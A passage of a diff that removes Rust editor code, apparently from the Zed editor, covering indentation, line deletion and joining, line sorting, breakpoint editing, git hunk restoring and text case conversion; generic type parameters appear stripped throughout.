this.selections.all::(cx); - let display_map = this.display_map.update(cx, |map, cx| map.snapshot(cx)); - for selection in &mut selections { - if selection.is_empty() { - let old_head = selection.head(); - let mut new_head = - movement::left(&display_map, old_head.to_display_point(&display_map)) - .to_point(&display_map); - if let Some((buffer, line_buffer_range)) = display_map - .buffer_snapshot - .buffer_line_for_row(MultiBufferRow(old_head.row)) - { - let indent_size = buffer.indent_size_for_line(line_buffer_range.start.row); - let indent_len = match indent_size.kind { - IndentKind::Space => { - buffer.settings_at(line_buffer_range.start, cx).tab_size - } - IndentKind::Tab => NonZeroU32::new(1).unwrap(), - }; - if old_head.column <= indent_size.len && old_head.column > 0 { - let indent_len = indent_len.get(); - new_head = cmp::min( - new_head, - MultiBufferPoint::new( - old_head.row, - ((old_head.column - 1) / indent_len) * indent_len, - ), - ); - } - } - - selection.set_head(new_head, SelectionGoal::None); - } - } - - this.signature_help_state.set_backspace_pressed(true); - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select(selections) - }); - this.insert("", window, cx); - let empty_str: Arc = Arc::from(""); - for (buffer, edits) in linked_ranges { - let snapshot = buffer.read(cx).snapshot(); - use text::ToPoint as TP; - - let edits = edits - .into_iter() - .map(|range| { - let end_point = TP::to_point(&range.end, &snapshot); - let mut start_point = TP::to_point(&range.start, &snapshot); - - if end_point == start_point { - let offset = text::ToOffset::to_offset(&range.start, &snapshot) - .saturating_sub(1); - start_point = - snapshot.clip_point(TP::to_point(&offset, &snapshot), Bias::Left); - }; - - (start_point..end_point, empty_str.clone()) - }) - .sorted_by_key(|(range, _)| range.start) - .collect::>(); - buffer.update(cx, |this, cx| { - this.edit(edits, None, cx); - }) - } - this.refresh_inline_completion(true, false, window, cx); - linked_editing_ranges::refresh_linked_ranges(this, window, cx); - }); - } - - pub fn delete(&mut self, _: &Delete, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - self.transact(window, cx, |this, window, cx| { - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.move_with(|map, selection| { - if selection.is_empty() { - let cursor = movement::right(map, selection.head()); - selection.end = cursor; - selection.reversed = true; - selection.goal = SelectionGoal::None; - } - }) - }); - this.insert("", window, cx); - this.refresh_inline_completion(true, false, window, cx); - }); - } - - pub fn backtab(&mut self, _: &Backtab, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - if self.move_to_prev_snippet_tabstop(window, cx) { - return; - } - self.outdent(&Outdent, window, cx); - } - - pub fn tab(&mut self, _: &Tab, window: &mut Window, cx: &mut Context) { - if self.move_to_next_snippet_tabstop(window, cx) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - return; - } - if self.read_only(cx) { - return; - } - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - let mut selections = self.selections.all_adjusted(cx); - let buffer = self.buffer.read(cx); - let snapshot = buffer.snapshot(cx); - let rows_iter = selections.iter().map(|s| s.head().row); - let suggested_indents = snapshot.suggested_indents(rows_iter, cx); - - let has_some_cursor_in_whitespace = selections - .iter() - .filter(|selection| selection.is_empty()) - .any(|selection| { - let cursor = selection.head(); - let current_indent = snapshot.indent_size_for_line(MultiBufferRow(cursor.row)); - cursor.column < current_indent.len - }); - - let mut edits = Vec::new(); - let mut prev_edited_row = 0; - let mut row_delta = 0; - for selection in &mut selections { - if selection.start.row != prev_edited_row { - row_delta = 0; - } - prev_edited_row = selection.end.row; - - // If the selection is non-empty, then increase the indentation of the selected lines. - if !selection.is_empty() { - row_delta = - Self::indent_selection(buffer, &snapshot, selection, &mut edits, row_delta, cx); - continue; - } - - // If the selection is empty and the cursor is in the leading whitespace before the - // suggested indentation, then auto-indent the line. - let cursor = selection.head(); - let current_indent = snapshot.indent_size_for_line(MultiBufferRow(cursor.row)); - if let Some(suggested_indent) = - suggested_indents.get(&MultiBufferRow(cursor.row)).copied() - { - // If there exist any empty selection in the leading whitespace, then skip - // indent for selections at the boundary. - if has_some_cursor_in_whitespace - && cursor.column == current_indent.len - && current_indent.len == suggested_indent.len - { - continue; - } - - if cursor.column < suggested_indent.len - && cursor.column <= current_indent.len - && current_indent.len <= suggested_indent.len - { - selection.start = Point::new(cursor.row, suggested_indent.len); - selection.end = selection.start; - if row_delta == 0 { - edits.extend(Buffer::edit_for_indent_size_adjustment( - cursor.row, - current_indent, - suggested_indent, - )); - row_delta = suggested_indent.len - current_indent.len; - } - continue; - } - } - - // Otherwise, insert a hard or soft tab. - let settings = buffer.language_settings_at(cursor, cx); - let tab_size = if settings.hard_tabs { - IndentSize::tab() - } else { - let tab_size = settings.tab_size.get(); - let indent_remainder = snapshot - .text_for_range(Point::new(cursor.row, 0)..cursor) - .flat_map(str::chars) - .fold(row_delta % tab_size, |counter: u32, c| { - if c == '\t' { - 0 - } else { - (counter + 1) % tab_size - } - }); - - let chars_to_next_tab_stop = tab_size - indent_remainder; - IndentSize::spaces(chars_to_next_tab_stop) - }; - selection.start = Point::new(cursor.row, cursor.column + row_delta + tab_size.len); - selection.end = selection.start; - edits.push((cursor..cursor, tab_size.chars().collect::())); - row_delta += tab_size.len; - } - - self.transact(window, cx, |this, window, cx| { - this.buffer.update(cx, |b, cx| b.edit(edits, None, cx)); - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select(selections) - }); - this.refresh_inline_completion(true, false, window, cx); - }); - } - - pub fn indent(&mut self, _: &Indent, window: &mut Window, cx: &mut Context) { - if self.read_only(cx) { - return; - } - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - let mut selections = self.selections.all::(cx); - let mut prev_edited_row = 0; - let mut row_delta = 0; - let mut edits = Vec::new(); - let buffer = self.buffer.read(cx); - let snapshot = buffer.snapshot(cx); - for selection in &mut selections { - if selection.start.row != prev_edited_row { - row_delta = 0; - } - prev_edited_row = selection.end.row; - - row_delta = - Self::indent_selection(buffer, &snapshot, selection, &mut edits, row_delta, cx); - } - - self.transact(window, cx, |this, window, cx| { - this.buffer.update(cx, |b, cx| b.edit(edits, None, cx)); - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select(selections) - }); - }); - } - - fn indent_selection( - buffer: &MultiBuffer, - snapshot: &MultiBufferSnapshot, - selection: &mut Selection, - edits: &mut Vec<(Range, String)>, - delta_for_start_row: u32, - cx: &App, - ) -> u32 { - let settings = buffer.language_settings_at(selection.start, cx); - let tab_size = settings.tab_size.get(); - let indent_kind = if settings.hard_tabs { - IndentKind::Tab - } else { - IndentKind::Space - }; - let mut start_row = selection.start.row; - let mut end_row = selection.end.row + 1; - - // If a selection ends at the beginning of a line, don't indent - // that last line. - if selection.end.column == 0 && selection.end.row > selection.start.row { - end_row -= 1; - } - - // Avoid re-indenting a row that has already been indented by a - // previous selection, but still update this selection's column - // to reflect that indentation. - if delta_for_start_row > 0 { - start_row += 1; - selection.start.column += delta_for_start_row; - if selection.end.row == selection.start.row { - selection.end.column += delta_for_start_row; - } - } - - let mut delta_for_end_row = 0; - let has_multiple_rows = start_row + 1 != end_row; - for row in start_row..end_row { - let current_indent = snapshot.indent_size_for_line(MultiBufferRow(row)); - let indent_delta = match (current_indent.kind, indent_kind) { - (IndentKind::Space, IndentKind::Space) => { - let columns_to_next_tab_stop = tab_size - (current_indent.len % tab_size); - IndentSize::spaces(columns_to_next_tab_stop) - } - (IndentKind::Tab, IndentKind::Space) => IndentSize::spaces(tab_size), - (_, IndentKind::Tab) => IndentSize::tab(), - }; - - let start = if has_multiple_rows || current_indent.len < selection.start.column { - 0 - } else { - selection.start.column - }; - let row_start = Point::new(row, start); - edits.push(( - row_start..row_start, - indent_delta.chars().collect::(), - )); - - // Update this selection's endpoints to reflect the indentation. - if row == selection.start.row { - selection.start.column += indent_delta.len; - } - if row == selection.end.row { - selection.end.column += indent_delta.len; - delta_for_end_row = indent_delta.len; - } - } - - if selection.start.row == selection.end.row { - delta_for_start_row + delta_for_end_row - } else { - delta_for_end_row - } - } - - pub fn outdent(&mut self, _: &Outdent, window: &mut Window, cx: &mut Context) { - if self.read_only(cx) { - return; - } - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - let selections = self.selections.all::(cx); - let mut deletion_ranges = Vec::new(); - let mut last_outdent = None; - { - let buffer = self.buffer.read(cx); - let snapshot = buffer.snapshot(cx); - for selection in &selections { - let settings = buffer.language_settings_at(selection.start, cx); - let tab_size = settings.tab_size.get(); - let mut rows = selection.spanned_rows(false, &display_map); - - // Avoid re-outdenting a row that has already been outdented by a - // previous selection. - if let Some(last_row) = last_outdent { - if last_row == rows.start { - rows.start = rows.start.next_row(); - } - } - let has_multiple_rows = rows.len() > 1; - for row in rows.iter_rows() { - let indent_size = snapshot.indent_size_for_line(row); - if indent_size.len > 0 { - let deletion_len = match indent_size.kind { - IndentKind::Space => { - let columns_to_prev_tab_stop = indent_size.len % tab_size; - if columns_to_prev_tab_stop == 0 { - tab_size - } else { - columns_to_prev_tab_stop - } - } - IndentKind::Tab => 1, - }; - let start = if has_multiple_rows - || deletion_len > selection.start.column - || indent_size.len < selection.start.column - { - 0 - } else { - selection.start.column - deletion_len - }; - deletion_ranges.push( - Point::new(row.0, start)..Point::new(row.0, start + deletion_len), - ); - last_outdent = Some(row); - } - } - } - } - - self.transact(window, cx, |this, window, cx| { - this.buffer.update(cx, |buffer, cx| { - let empty_str: Arc = Arc::default(); - buffer.edit( - deletion_ranges - .into_iter() - .map(|range| (range, empty_str.clone())), - None, - cx, - ); - }); - let selections = this.selections.all::(cx); - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select(selections) - }); - }); - } - - pub fn autoindent(&mut self, _: &AutoIndent, window: &mut Window, cx: &mut Context) { - if self.read_only(cx) { - return; - } - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - let selections = self - .selections - .all::(cx) - .into_iter() - .map(|s| s.range()); - - self.transact(window, cx, |this, window, cx| { - this.buffer.update(cx, |buffer, cx| { - buffer.autoindent_ranges(selections, cx); - }); - let selections = this.selections.all::(cx); - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select(selections) - }); - }); - } - - pub fn delete_line(&mut self, _: &DeleteLine, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - let selections = self.selections.all::(cx); - - let mut new_cursors = Vec::new(); - let mut edit_ranges = Vec::new(); - let mut selections = selections.iter().peekable(); - while let Some(selection) = selections.next() { - let mut rows = selection.spanned_rows(false, &display_map); - let goal_display_column = selection.head().to_display_point(&display_map).column(); - - // Accumulate contiguous regions of rows that we want to delete. - while let Some(next_selection) = selections.peek() { - let next_rows = next_selection.spanned_rows(false, &display_map); - if next_rows.start <= rows.end { - rows.end = next_rows.end; - selections.next().unwrap(); - } else { - break; - } - } - - let buffer = &display_map.buffer_snapshot; - let mut edit_start = Point::new(rows.start.0, 0).to_offset(buffer); - let edit_end; - let cursor_buffer_row; - if buffer.max_point().row >= rows.end.0 { - // If there's a line after the range, delete the \n from the end of the row range - // and position the cursor on the next line. - edit_end = Point::new(rows.end.0, 0).to_offset(buffer); - cursor_buffer_row = rows.end; - } else { - // If there isn't a line after the range, delete the \n from the line before the - // start of the row range and position the cursor there. - edit_start = edit_start.saturating_sub(1); - edit_end = buffer.len(); - cursor_buffer_row = rows.start.previous_row(); - } - - let mut cursor = Point::new(cursor_buffer_row.0, 0).to_display_point(&display_map); - *cursor.column_mut() = - cmp::min(goal_display_column, display_map.line_len(cursor.row())); - - new_cursors.push(( - selection.id, - buffer.anchor_after(cursor.to_point(&display_map)), - )); - edit_ranges.push(edit_start..edit_end); - } - - self.transact(window, cx, |this, window, cx| { - let buffer = this.buffer.update(cx, |buffer, cx| { - let empty_str: Arc = Arc::default(); - buffer.edit( - edit_ranges - .into_iter() - .map(|range| (range, empty_str.clone())), - None, - cx, - ); - buffer.snapshot(cx) - }); - let new_selections = new_cursors - .into_iter() - .map(|(id, cursor)| { - let cursor = cursor.to_point(&buffer); - Selection { - id, - start: cursor, - end: cursor, - reversed: false, - goal: SelectionGoal::None, - } - }) - .collect(); - - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select(new_selections); - }); - }); - } - - pub fn join_lines_impl( - &mut self, - insert_whitespace: bool, - window: &mut Window, - cx: &mut Context, - ) { - if self.read_only(cx) { - return; - } - let mut row_ranges = Vec::>::new(); - for selection in self.selections.all::(cx) { - let start = MultiBufferRow(selection.start.row); - // Treat single line selections as if they include the next line. Otherwise this action - // would do nothing for single line selections individual cursors. - let end = if selection.start.row == selection.end.row { - MultiBufferRow(selection.start.row + 1) - } else { - MultiBufferRow(selection.end.row) - }; - - if let Some(last_row_range) = row_ranges.last_mut() { - if start <= last_row_range.end { - last_row_range.end = end; - continue; - } - } - row_ranges.push(start..end); - } - - let snapshot = self.buffer.read(cx).snapshot(cx); - let mut cursor_positions = Vec::new(); - for row_range in &row_ranges { - let anchor = snapshot.anchor_before(Point::new( - row_range.end.previous_row().0, - snapshot.line_len(row_range.end.previous_row()), - )); - cursor_positions.push(anchor..anchor); - } - - self.transact(window, cx, |this, window, cx| { - for row_range in row_ranges.into_iter().rev() { - for row in row_range.iter_rows().rev() { - let end_of_line = Point::new(row.0, snapshot.line_len(row)); - let next_line_row = row.next_row(); - let indent = snapshot.indent_size_for_line(next_line_row); - let start_of_next_line = Point::new(next_line_row.0, indent.len); - - let replace = - if snapshot.line_len(next_line_row) > indent.len && insert_whitespace { - " " - } else { - "" - }; - - this.buffer.update(cx, |buffer, cx| { - buffer.edit([(end_of_line..start_of_next_line, replace)], None, cx) - }); - } - } - - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select_anchor_ranges(cursor_positions) - }); - }); - } - - pub fn join_lines(&mut self, _: &JoinLines, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - self.join_lines_impl(true, window, cx); - } - - pub fn sort_lines_case_sensitive( - &mut self, - _: &SortLinesCaseSensitive, - window: &mut Window, - cx: &mut Context, - ) { - self.manipulate_lines(window, cx, |lines| lines.sort()) - } - - pub fn sort_lines_case_insensitive( - &mut self, - _: &SortLinesCaseInsensitive, - window: &mut Window, - cx: &mut Context, - ) { - self.manipulate_lines(window, cx, |lines| { - lines.sort_by_key(|line| line.to_lowercase()) - }) - } - - pub fn unique_lines_case_insensitive( - &mut self, - _: &UniqueLinesCaseInsensitive, - window: &mut Window, - cx: &mut Context, - ) { - self.manipulate_lines(window, cx, |lines| { - let mut seen = HashSet::default(); - lines.retain(|line| seen.insert(line.to_lowercase())); - }) - } - - pub fn unique_lines_case_sensitive( - &mut self, - _: &UniqueLinesCaseSensitive, - window: &mut Window, - cx: &mut Context, - ) { - self.manipulate_lines(window, cx, |lines| { - let mut seen = HashSet::default(); - lines.retain(|line| seen.insert(*line)); - }) - } - - pub fn reload_file(&mut self, _: &ReloadFile, window: &mut Window, cx: &mut Context) { - let Some(project) = self.project.clone() else { - return; - }; - self.reload(project, window, cx) - .detach_and_notify_err(window, cx); - } - - pub fn restore_file( - &mut self, - _: &::git::RestoreFile, - window: &mut Window, - cx: &mut Context, - ) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - let mut buffer_ids = HashSet::default(); - let snapshot = self.buffer().read(cx).snapshot(cx); - for selection in self.selections.all::(cx) { - buffer_ids.extend(snapshot.buffer_ids_for_range(selection.range())) - } - - let buffer = self.buffer().read(cx); - let ranges = buffer_ids - .into_iter() - .flat_map(|buffer_id| buffer.excerpt_ranges_for_buffer(buffer_id, cx)) - .collect::>(); - - self.restore_hunks_in_ranges(ranges, window, cx); - } - - pub fn git_restore(&mut self, _: &Restore, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - let selections = self - .selections - .all(cx) - .into_iter() - .map(|s| s.range()) - .collect(); - self.restore_hunks_in_ranges(selections, window, cx); - } - - pub fn restore_hunks_in_ranges( - &mut self, - ranges: Vec>, - window: &mut Window, - cx: &mut Context, - ) { - let mut revert_changes = HashMap::default(); - let chunk_by = self - .snapshot(window, cx) - .hunks_for_ranges(ranges) - .into_iter() - .chunk_by(|hunk| hunk.buffer_id); - for (buffer_id, hunks) in &chunk_by { - let hunks = hunks.collect::>(); - for hunk in &hunks { - self.prepare_restore_change(&mut revert_changes, hunk, cx); - } - self.do_stage_or_unstage(false, buffer_id, hunks.into_iter(), cx); - } - drop(chunk_by); - if !revert_changes.is_empty() { - self.transact(window, cx, |editor, window, cx| { - editor.restore(revert_changes, window, cx); - }); - } - } - - pub fn open_active_item_in_terminal( - &mut self, - _: &OpenInTerminal, - window: &mut Window, - cx: &mut Context, - ) { - if let Some(working_directory) = self.active_excerpt(cx).and_then(|(_, buffer, _)| { - let project_path = buffer.read(cx).project_path(cx)?; - let project = self.project.as_ref()?.read(cx); - let entry = project.entry_for_path(&project_path, cx)?; - let parent = match &entry.canonical_path { - Some(canonical_path) => canonical_path.to_path_buf(), - None => project.absolute_path(&project_path, cx)?, - } - .parent()? - .to_path_buf(); - Some(parent) - }) { - window.dispatch_action(OpenTerminal { working_directory }.boxed_clone(), cx); - } - } - - fn set_breakpoint_context_menu( - &mut self, - display_row: DisplayRow, - position: Option, - clicked_point: gpui::Point, - window: &mut Window, - cx: &mut Context, - ) { - if !cx.has_flag::() { - return; - } - let source = self - .buffer - .read(cx) - .snapshot(cx) - .anchor_before(Point::new(display_row.0, 0u32)); - - let context_menu = self.breakpoint_context_menu(position.unwrap_or(source), window, cx); - - self.mouse_context_menu = MouseContextMenu::pinned_to_editor( - self, - source, - clicked_point, - context_menu, - window, - cx, - ); - } - - fn add_edit_breakpoint_block( - &mut self, - anchor: Anchor, - breakpoint: &Breakpoint, - edit_action: BreakpointPromptEditAction, - window: &mut Window, - cx: &mut Context, - ) { - let weak_editor = cx.weak_entity(); - let bp_prompt = cx.new(|cx| { - BreakpointPromptEditor::new( - weak_editor, - anchor, - breakpoint.clone(), - edit_action, - window, - cx, - ) - }); - - let height = bp_prompt.update(cx, |this, cx| { - this.prompt - .update(cx, |prompt, cx| prompt.max_point(cx).row().0 + 1 + 2) - }); - let cloned_prompt = bp_prompt.clone(); - let blocks = vec![BlockProperties { - style: BlockStyle::Sticky, - placement: BlockPlacement::Above(anchor), - height: Some(height), - render: Arc::new(move |cx| { - *cloned_prompt.read(cx).gutter_dimensions.lock() = *cx.gutter_dimensions; - cloned_prompt.clone().into_any_element() - }), - priority: 0, - }]; - - let focus_handle = bp_prompt.focus_handle(cx); - window.focus(&focus_handle); - - let block_ids = self.insert_blocks(blocks, None, cx); - bp_prompt.update(cx, |prompt, _| { - prompt.add_block_ids(block_ids); - }); - } - - pub(crate) fn breakpoint_at_row( - &self, - row: u32, - window: &mut Window, - cx: &mut Context, - ) -> Option<(Anchor, Breakpoint)> { - let snapshot = self.snapshot(window, cx); - let breakpoint_position = snapshot.buffer_snapshot.anchor_before(Point::new(row, 0)); - - self.breakpoint_at_anchor(breakpoint_position, &snapshot, cx) - } - - pub(crate) fn breakpoint_at_anchor( - &self, - breakpoint_position: Anchor, - snapshot: &EditorSnapshot, - cx: &mut Context, - ) -> Option<(Anchor, Breakpoint)> { - let project = self.project.clone()?; - - let buffer_id = breakpoint_position.buffer_id.or_else(|| { - snapshot - .buffer_snapshot - .buffer_id_for_excerpt(breakpoint_position.excerpt_id) - })?; - - let enclosing_excerpt = breakpoint_position.excerpt_id; - let buffer = project.read_with(cx, |project, cx| project.buffer_for_id(buffer_id, cx))?; - let buffer_snapshot = buffer.read(cx).snapshot(); - - let row = buffer_snapshot - .summary_for_anchor::(&breakpoint_position.text_anchor) - .row; - - let line_len = snapshot.buffer_snapshot.line_len(MultiBufferRow(row)); - let anchor_end = snapshot - .buffer_snapshot - .anchor_after(Point::new(row, line_len)); - - let bp = self - .breakpoint_store - .as_ref()? - .read_with(cx, |breakpoint_store, cx| { - breakpoint_store - .breakpoints( - &buffer, - Some(breakpoint_position.text_anchor..anchor_end.text_anchor), - &buffer_snapshot, - cx, - ) - .next() - .and_then(|(anchor, bp)| { - let breakpoint_row = buffer_snapshot - .summary_for_anchor::(anchor) - .row; - - if breakpoint_row == row { - snapshot - .buffer_snapshot - .anchor_in_excerpt(enclosing_excerpt, *anchor) - .map(|anchor| (anchor, bp.clone())) - } else { - None - } - }) - }); - bp - } - - pub fn edit_log_breakpoint( - &mut self, - _: &EditLogBreakpoint, - window: &mut Window, - cx: &mut Context, - ) { - for (anchor, breakpoint) in self.breakpoints_at_cursors(window, cx) { - let breakpoint = breakpoint.unwrap_or_else(|| Breakpoint { - message: None, - state: BreakpointState::Enabled, - condition: None, - hit_condition: None, - }); - - self.add_edit_breakpoint_block( - anchor, - &breakpoint, - BreakpointPromptEditAction::Log, - window, - cx, - ); - } - } - - fn breakpoints_at_cursors( - &self, - window: &mut Window, - cx: &mut Context, - ) -> Vec<(Anchor, Option)> { - let snapshot = self.snapshot(window, cx); - let cursors = self - .selections - .disjoint_anchors() - .into_iter() - .map(|selection| { - let cursor_position: Point = selection.head().to_point(&snapshot.buffer_snapshot); - - let breakpoint_position = self - .breakpoint_at_row(cursor_position.row, window, cx) - .map(|bp| bp.0) - .unwrap_or_else(|| { - snapshot - .display_snapshot - .buffer_snapshot - .anchor_after(Point::new(cursor_position.row, 0)) - }); - - let breakpoint = self - .breakpoint_at_anchor(breakpoint_position, &snapshot, cx) - .map(|(anchor, breakpoint)| (anchor, Some(breakpoint))); - - breakpoint.unwrap_or_else(|| (breakpoint_position, None)) - }) - // There might be multiple cursors on the same line; all of them should have the same anchors though as their breakpoints positions, which makes it possible to sort and dedup the list. - .collect::>(); - - cursors.into_iter().collect() - } - - pub fn enable_breakpoint( - &mut self, - _: &crate::actions::EnableBreakpoint, - window: &mut Window, - cx: &mut Context, - ) { - for (anchor, breakpoint) in self.breakpoints_at_cursors(window, cx) { - let Some(breakpoint) = breakpoint.filter(|breakpoint| breakpoint.is_disabled()) else { - continue; - }; - self.edit_breakpoint_at_anchor( - anchor, - breakpoint, - BreakpointEditAction::InvertState, - cx, - ); - } - } - - pub fn disable_breakpoint( - &mut self, - _: &crate::actions::DisableBreakpoint, - window: &mut Window, - cx: &mut Context, - ) { - for (anchor, breakpoint) in self.breakpoints_at_cursors(window, cx) { - let Some(breakpoint) = breakpoint.filter(|breakpoint| breakpoint.is_enabled()) else { - continue; - }; - self.edit_breakpoint_at_anchor( - anchor, - breakpoint, - BreakpointEditAction::InvertState, - cx, - ); - } - } - - pub fn toggle_breakpoint( - &mut self, - _: &crate::actions::ToggleBreakpoint, - window: &mut Window, - cx: &mut Context, - ) { - for (anchor, breakpoint) in self.breakpoints_at_cursors(window, cx) { - if let Some(breakpoint) = breakpoint { - self.edit_breakpoint_at_anchor( - anchor, - breakpoint, - BreakpointEditAction::Toggle, - cx, - ); - } else { - self.edit_breakpoint_at_anchor( - anchor, - Breakpoint::new_standard(), - BreakpointEditAction::Toggle, - cx, - ); - } - } - } - - pub fn edit_breakpoint_at_anchor( - &mut self, - breakpoint_position: Anchor, - breakpoint: Breakpoint, - edit_action: BreakpointEditAction, - cx: &mut Context, - ) { - let Some(breakpoint_store) = &self.breakpoint_store else { - return; - }; - - let Some(buffer_id) = breakpoint_position.buffer_id.or_else(|| { - if breakpoint_position == Anchor::min() { - self.buffer() - .read(cx) - .excerpt_buffer_ids() - .into_iter() - .next() - } else { - None - } - }) else { - return; - }; - - let Some(buffer) = self.buffer().read(cx).buffer(buffer_id) else { - return; - }; - - breakpoint_store.update(cx, |breakpoint_store, cx| { - breakpoint_store.toggle_breakpoint( - buffer, - (breakpoint_position.text_anchor, breakpoint), - edit_action, - cx, - ); - }); - - cx.notify(); - } - - #[cfg(any(test, feature = "test-support"))] - pub fn breakpoint_store(&self) -> Option> { - self.breakpoint_store.clone() - } - - pub fn prepare_restore_change( - &self, - revert_changes: &mut HashMap, Rope)>>, - hunk: &MultiBufferDiffHunk, - cx: &mut App, - ) -> Option<()> { - if hunk.is_created_file() { - return None; - } - let buffer = self.buffer.read(cx); - let diff = buffer.diff_for(hunk.buffer_id)?; - let buffer = buffer.buffer(hunk.buffer_id)?; - let buffer = buffer.read(cx); - let original_text = diff - .read(cx) - .base_text() - .as_rope() - .slice(hunk.diff_base_byte_range.clone()); - let buffer_snapshot = buffer.snapshot(); - let buffer_revert_changes = revert_changes.entry(buffer.remote_id()).or_default(); - if let Err(i) = buffer_revert_changes.binary_search_by(|probe| { - probe - .0 - .start - .cmp(&hunk.buffer_range.start, &buffer_snapshot) - .then(probe.0.end.cmp(&hunk.buffer_range.end, &buffer_snapshot)) - }) { - buffer_revert_changes.insert(i, (hunk.buffer_range.clone(), original_text)); - Some(()) - } else { - None - } - } - - pub fn reverse_lines(&mut self, _: &ReverseLines, window: &mut Window, cx: &mut Context) { - self.manipulate_lines(window, cx, |lines| lines.reverse()) - } - - pub fn shuffle_lines(&mut self, _: &ShuffleLines, window: &mut Window, cx: &mut Context) { - self.manipulate_lines(window, cx, |lines| lines.shuffle(&mut thread_rng())) - } - - fn manipulate_lines( - &mut self, - window: &mut Window, - cx: &mut Context, - mut callback: Fn, - ) where - Fn: FnMut(&mut Vec<&str>), - { - self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); - - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); - let buffer = self.buffer.read(cx).snapshot(cx); - - let mut edits = Vec::new(); - - let selections = self.selections.all::(cx); - let mut selections = selections.iter().peekable(); - let mut contiguous_row_selections = Vec::new(); - let mut new_selections = Vec::new(); - let mut added_lines = 0; - let mut removed_lines = 0; - - while let Some(selection) = selections.next() { - let (start_row, end_row) = consume_contiguous_rows( - &mut contiguous_row_selections, - selection, - &display_map, - &mut selections, - ); - - let start_point = Point::new(start_row.0, 0); - let end_point = Point::new( - end_row.previous_row().0, - buffer.line_len(end_row.previous_row()), - ); - let text = buffer - .text_for_range(start_point..end_point) - .collect::(); - - let mut lines = text.split('\n').collect_vec(); - - let lines_before = lines.len(); - callback(&mut lines); - let lines_after = lines.len(); - - edits.push((start_point..end_point, lines.join("\n"))); - - // Selections must change based on added and removed line count - let start_row = - MultiBufferRow(start_point.row + added_lines as u32 - removed_lines as u32); - let end_row = MultiBufferRow(start_row.0 + lines_after.saturating_sub(1) as u32); - new_selections.push(Selection { - id: selection.id, - start: start_row, - end: end_row, - goal: SelectionGoal::None, - reversed: selection.reversed, - }); - - if lines_after > lines_before { - added_lines += lines_after - lines_before; - } else if lines_before > lines_after { - removed_lines += lines_before - lines_after; - } - } - - self.transact(window, cx, |this, window, cx| { - let buffer = this.buffer.update(cx, |buffer, cx| { - buffer.edit(edits, None, cx); - buffer.snapshot(cx) - }); - - // Recalculate offsets on newly edited buffer - let new_selections = new_selections - .iter() - .map(|s| { - let start_point = Point::new(s.start.0, 0); - let end_point = Point::new(s.end.0, buffer.line_len(s.end)); - Selection { - id: s.id, - start: buffer.point_to_offset(start_point), - end: buffer.point_to_offset(end_point), - goal: s.goal, - reversed: s.reversed, - } - }) - .collect(); - - this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { - s.select(new_selections); - }); - - this.request_autoscroll(Autoscroll::fit(), cx); - }); - } - - pub fn toggle_case(&mut self, _: &ToggleCase, window: &mut Window, cx: &mut Context) { - self.manipulate_text(window, cx, |text| { - let has_upper_case_characters = text.chars().any(|c| c.is_uppercase()); - if has_upper_case_characters { - text.to_lowercase() - } else { - text.to_uppercase() - } - }) - } - - pub fn convert_to_upper_case( - &mut self, - _: &ConvertToUpperCase, - window: &mut Window, - cx: &mut Context, - ) { - self.manipulate_text(window, cx, |text| text.to_uppercase()) - } - - pub fn convert_to_lower_case( - &mut self, - _: &ConvertToLowerCase, - window: &mut Window, - cx: &mut Context, - ) { - self.manipulate_text(window, cx, |text| text.to_lowercase()) - } - - pub fn convert_to_title_case( - &mut self, - _: &ConvertToTitleCase, - window: &mut Window, - cx: &mut Context, - ) { - self.manipulate_text(window, cx, |text| { - text.split('\n') - .map(|line| line.to_case(Case::Title)) - .join("\n") - }) - } - - pub fn convert_to_snake_case( - &mut self, - _: &ConvertToSnakeCase, - window: &mut Window, - cx: &mut Context, - ) { - self.manipulate_text(window, cx, |text| text.to_case(Case::Snake)) - } - - pub fn convert_to_kebab_case( - &mut self, - _: &ConvertToKebabCase, - window: &mut Window, - cx: &mut Context, - ) { - self.manipulate_text(window, cx, |text| text.to_case(Case::Kebab)) - } - - pub fn convert_to_upper_camel_case( - &mut self, - _: &ConvertToUpperCamelCase, - window: &mut Window, - cx: &mut Context, - ) { - self.manipulate_text(window, cx, |text| { - text.split('\n') - .map(|line| line.to_case(Case::UpperCamel)) - .join("\n") - }) - } - - pub fn convert_to_lower_camel_case( - &mut self, - _: &ConvertToLowerCamelCase, - window: &mut Window, - cx: &mut Context, - ) { - self.manipulate_text(window, cx, |text| text.to_case(Case::Camel)) - } - - pub fn convert_to_opposite_case( - &mut self, - _: &ConvertToOppositeCase, - window: &mut Window, - cx: &mut Context, - ) { - self.manipulate_text(window, cx, |text| { - text.chars() - .fold(String::with_capacity(text.len()), |mut t, c| { - if c.is_uppercase() { - t.extend(c.to_lowercase()); - } else { - t.extend(c.to_uppercase()); - } - t - }) - }) - } - - pub fn convert_to_rot13( - &mut self, - _: &ConvertToRot13, - window: &mut Window, - cx: &mut Context, - ) { - self.manipulate_text(window, cx, |text| { - text.chars() - .map(|c| match c { - 'A'..='M' | 'a'..='m' => ((c as u8) + 13) as char, - 'N'..='Z' | 